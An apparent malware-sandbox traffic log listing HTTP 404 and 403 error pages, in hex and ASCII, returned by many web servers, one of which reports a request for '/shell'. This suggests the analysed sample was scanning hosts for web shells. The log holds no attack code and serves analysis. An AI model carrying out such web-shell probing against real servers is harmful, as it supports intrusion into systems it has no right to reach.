      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:05 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:07 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:34:23 GMTServer: Apache/2.2.22 (Ubuntu)Last-Modified: Mon, 22 Jun 2015 08:55:56 GMTETag: "ea0357-2c8-51917712344c9"Accept-Ranges: bytesContent-Length: 712Vary: Accept-EncodingKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 404</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="images/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner">
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 26 Jan 2024 14:32:10 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:12 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-Azure-Application-Gateway/v2Date: Fri, 26 Jan 2024 14:32:15 GMTContent-Type: text/htmlContent-Length: 179Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4d 69 63 72 6f 73 6f 66 74 2d 41 7a 75 72 65 2d 41 70 70 6c 69 63 61 74 69 6f 6e 2d 47 61 74 65 77 61 79 2f 76 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>Microsoft-Azure-Application-Gateway/v2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:18 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:18 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:32:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:21 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:32:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:23 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:32:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:25 GMTContent-Type: text/htmlContent-Length: 6164Connection: keep-aliveVary: Accept-EncodingETag: "60891687-1814"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 61 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 0d 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 28 46 69 6c 65 29 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 73 74 61 74 75 73 2e 63 73 73 22 3e 0d 0a 09 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 09 3c 62 6f 64 79 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 73 74 61 74 75 73 5f 68 65 61 64 22 3e 0d 0a 09 09 09 3c 21 2d 2d 20 3c 64 69 76 3e 3c 73 76 67 20 69 64 3d 22 e3 83 ac e3 82 a4 e3 83 a4 e3 83 bc 5f 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 34 30 20 31 32 30 22 3e 3c 73 74 79 6c 65 3e 2e 73 74 30 7b 66 69 6c 6c 3a 23 66 66 66 7d 3c 2f 73 74 79 6c 65 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 32 36 36 2e 39 20 31 31 34 2e 32 76 2d 31 33 2e 34 6c 2d 35 2e 37 20 31 31 2e 36 68 2d 32 6c 2d 35 2e 37 2d 31 31 2e 36 76 31 33 2e 34 68 2d 32 2e 39 76 2d 31 38 68 33 2e 36 6c 35 2e 39 20 31 31 2e 39 20 35 2e 39 2d 31 31 2e 39 68 33 2e 36 76 31 38 68 2d 32 2e 37 7a 4d 32 38 32 2e 35 20 31 31 32 2e 35 63 2d 31 20 31 2e 32 2d 32 2e 35 20 31 2e 38 2d 34 2e 35 20 31 2e 38 2d 33 20 30 2d 34 2e 38 2d 31 2e 38 2d 34 2e 38 2d 34 2e 32 20 30 2d 32 2e 35 20 31 2e 39 2d 34 2e 31 20 35 2e 32 2d 34 2e 31 68 34 2e 31 76 2d 2e 34 63 30 2d 31 2e 37 2d 31 2e 31 2d 32 2e 38 2d 33 2e 33 2d 32 2e 38 2d 31 2e 33 20 30 2d 32 2e 37 2e 35 2d 34 20 31 2e 34 6c 2d 31 2e 32 2d 32 2e 31 63 31 2e 39 2d 31 2e 31 20 33 2e 33 2d 31 2e 37 20 35 2e 39 2d 31 2e 37 20 33 2e 35 20 30 20 35 2e 35 20 31 2e 38 20 35 2e 35 20 34 2e 38 76 39 68 2d 32 2e 39 76 2d 31 2e 37 7a 6d 2d 2e 31 2d 33 2e 31 76 2d 31 2e 33 68 2d 33 2e 37 63 2d 31 2e 39 20 30 2d 32 2e 38 2e 35 2d 32 2e 38 20 31 2e 38 20 30 20 31 2e 32 20 31 20 32 20 3
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:32:30 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 26 Jan 2024 14:32:33 GMTContent-Type: application/octet-streamConnection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET, POST, OPTIONSAccess-Control-Allow-Headers: DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,AuthorizationData Raw: 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: Not Found
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.0Date: Fri, 26 Jan 2024 14:32:34 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.21.0</center></body></html>
